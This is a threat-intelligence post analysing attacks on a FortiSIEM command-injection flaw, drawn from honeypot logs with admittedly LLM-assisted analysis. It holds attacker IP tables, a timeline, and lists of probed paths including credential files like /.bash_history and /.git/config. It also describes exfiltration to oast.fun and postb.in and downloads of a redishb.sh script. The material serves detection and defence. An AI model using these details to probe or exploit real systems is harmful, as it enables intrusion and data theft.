Threat Intel
‘An improper neutralization of special elements used in an OS command (‘OS Command Injection’) vulnerability [CWE-78] in FortiSIEM may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests.’
https://www.fortiguard.com/psirt/FG-IR-25-772
This analysis was conducted using data from Defused, enrichment from IPINFO and SHODAN and then analysis using an LLM (GROK) (so take the analysis with a pinch of salt):
Updated FortiSIEM CVE-2025-64155 Exploitation Analysis
Post-Exploitation Activity Observed – January 16, 2026
Report Updated: January 16, 2026 ~19:00 GMT
Key Update – Escalation Observed
On January 16, 2026, the primary attacker IP 154.192.222.43 (Pakistan, Nayatel) shifted from reconnaissance/exfiltration to active post-exploitation scanning shortly after successful CVE-2025-64155 command injection attempts.
Timeline:
- ~16:31–16:37: Three confirmed CVE exploits (hostname read, ICMP/DNS exfiltration).
- ~16:42: Access to
/proof.txt(likely verifying web access or leaving a marker). - ~17:29–17:35: Intensive directory brute-force using gobuster/3.8.2 targeting common webshell, admin panel, and backup paths.
This indicates the attacker has achieved initial code execution and is now hunting for persistence mechanisms, existing backdoors, or sensitive files.
Recent Activity from 154.192.222.43 (Jan 16, 2026)
| Time (GMT) | Alert Type | Severity | Request Summary | Notes |
|---|---|---|---|---|
| 17:35–17:31 | Unknown Traffic | minor | ~70 GET requests via gobuster | Brute-forcing paths like /admin, /shell.php, /.git/config, /te.html, /proof.txt, etc. |
| 17:30 | Unknown Traffic | minor | SIP OPTIONS, RTSP OPTIONS, /nice ports,/Trinity.txt.bak | Protocol probing (SIP/RTSP OPTIONS) + likely Nmap service fingerprinting (classic “/nice ports,/Trinity.txt.bak” probe used by Nmap HTTP scripts) |
| 17:29 | Unknown Traffic | minor | HEAD /, GET /login (curl) | Basic enumeration |
| 16:42 | Unknown Traffic | minor | GET /proof.txt | Potential marker or web access confirmation |
| 16:37 | Vulnerability Exploited | major | CVE-2025-64155 payload | ICMP hostname exfil to self |
| 16:33 | Vulnerability Exploited | major | CVE-2025-64155 payload | DNS hostname exfil (oast.fun) |
| 16:31 | Vulnerability Exploited | major | CVE-2025-64155 payload | cat /etc/hostname |
Gobuster wordlist appears to target common webshells (e.g., sa.php, sf.php), config leaks (.git, .bash_history), and admin interfaces.
Overall Campaign Context
The core infrastructure (11 IPs) remains active. 154.192.222.43 is the most persistent actor, now demonstrating clear post-exploitation intent.
Other recent probes (e.g., 213.209.159.181 attempting .git/config, various scanners hitting common Forti paths) are opportunistic background noise but highlight broad exposure scanning.
Indicators of Compromise (Updated)
Primary Attacker IP (High Confidence)
- 154.192.222.43 – Pakistan, Nayatel AS23674 – Active exploitation + post-exploit scanning
User-Agents & Tools
- gobuster/3.8.2 – Directory brute-forcing
- curl/8.18.0 – Basic checks
- Likely Nmap (via “/nice ports,/Trinity.txt.bak” probe)
Post-Exploitation Paths Targeted (Sample)
/admin, /shell.php, /sa.php, /.git/config, /.bash_history, /te.html, /proof.txt, /cgi-bin/, /remote/logincheck, /geoserver/web/
Recommendations (Urgent)
- Patch CVE-2025-64155 immediately if not already done.
- Block the full infrastructure list (especially 154.192.222.43) at firewall/perimeter.
- Internal hunt: Search for /opt/charting/redishb.sh, unusual cron jobs, outbound ICMP/DNS to suspicious domains, or new files in /tmp.
- Restrict exposure: FortiSIEM management interface should not be internet-facing.
- Monitor closely: Activity from this IP is ongoing and escalating.
Threat Level: Elevated – Post-exploitation phase in progress.
IOCs
| IP Address | Country | City | ASN / Organization | Key Activity Observed |
|---|---|---|---|---|
| 38.180.81.238 | US | Chicago | AS29802 / 3NT SOLUTIONS LLP | Payload delivery (redishb.sh) |
| 103.224.84.76 | TH | Pak Kret | AS56309 / ReadyIDC Co.,Ltd. | Payload delivery (redishb.sh) |
| 120.231.127.227 | CN | Shanghai | AS9808 / China Mobile | Timing tests (sleep 3) |
| 129.226.190.169 | HK | Hong Kong | AS132203 / Unknown | Payload delivery (redishb.sh) |
| 146.70.201.245 | JP | Togoshi | AS9009 / M247 LTD (VPN) | Advanced RCE + reverse shell attempts |
| 154.192.222.43 | PK | Islamabad | AS23674 / Nayatel Pvt Ltd | Most active: Exfil, exploits, gobuster scanning, Nmap probes |
| 156.146.55.227 | BG | Sofia | AS212238 / Datacamp Ltd (VPN) | HTTP exfil testing (postb.in) |
| 167.17.179.109 | JP | Tokyo | AS26383 / Baxet Group | Payload delivery (redishb.sh) |
| 193.111.208.118 | US | Dallas | AS202015 / HZ Hosting Ltd | Payload delivery (redishb.sh variants) |
| 209.126.11.25 | US | St. Louis | AS40021 / Contabo Inc. | Payload delivery (redishb.sh) |
| 220.181.41.80 | CN | Beijing | AS23724 / CHINANET | Timing tests (sleep 3) |
Summary (AI)
In January 2026, FortiSIEM systems faced widespread exploitation of CVE-2025-64155, a critical unauthenticated command injection vulnerability (CVSS 9.8) in the Elasticsearch storage configuration endpoint. Opportunistic attackers leveraged a distributed network of 11 IPs across countries like Pakistan, Japan, China, and the US to perform reconnaissance, blind data exfiltration via ICMP and DNS, and persistence through malicious script downloads (e.g., redishb.sh). Notably, the primary actor from IP 154.192.222.43 escalated activity on January 16, shifting from successful exploits to aggressive directory brute-forcing with tools like gobuster, signaling active post-compromise hunting for webshells and sensitive files. This ongoing campaign underscores the rapid weaponization of public PoCs—organizations must urgently patch, block the identified infrastructure, and hunt for indicators like unusual cron jobs or outbound connections to mitigate risks.
